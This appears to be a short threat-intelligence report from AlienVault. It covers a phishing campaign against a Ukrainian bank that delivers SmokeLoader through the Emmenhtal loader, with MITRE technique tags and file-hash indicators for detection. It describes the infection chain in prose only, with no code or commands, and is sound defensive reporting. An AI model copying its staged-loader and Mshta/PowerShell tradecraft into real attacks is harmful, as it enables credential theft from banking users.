A malicious campaign targeting First Ukrainian International Bank has been observed using the Emmenhtal loader to distribute SmokeLoader malware. The infection chain begins with a deceptive email containing a 7z archive, which extracts to reveal a bait PDF and a shortcut file. The shortcut downloads additional files, leading to the execution of PowerShell and Mshta to retrieve the Emmenhtal loader. This loader, disguised as a modified Windows utility, deploys SmokeLoader while maintaining a stealthy execution flow. SmokeLoader, a modular malware, can download additional payloads, steal credentials, and execute remote commands. The campaign demonstrates the evolving tactics of financially motivated threat actors, leveraging LOLBAS techniques and commercial protection tools for obfuscation. Author: AlienVault
Related Tags:
emmenhtal
T1564.004
T1218.005
Cryptbot
Obfuscation
mshta
Banking
T1059.001
SmokeLoader
Associated Indicators:
EA3C8DBE0B30FB6D5C68EB55454B2A9471E8E21ABB4343306445B4905370F51C
A1706EC6772DAA7A54C67117D5CE7B5FD5285F6245AD08F46B3B4176A7F1E021
4EE62002F89DFFA52405DF9C082CBA4D4DFA7DE7A207CB3A3F37BE76CA6454C4
DD510900D091A35F0EF6D906BE087A1AE7969E3D75450CEF475E1A032736CC20
AE64762D044F4B108F2FF820C0744D199C4C33616AF17C35C3634AEF79C4E3FF
E67CF0E21C1AF1D6B765F8F8732729893E1B910C
2C23965943ABEF32A07020BDA8B17C61F459DAE6
9DC41C7FBF291A63621EB8B67DD01668
945D7AE4CC00199EF83CDAD88BAC4C6B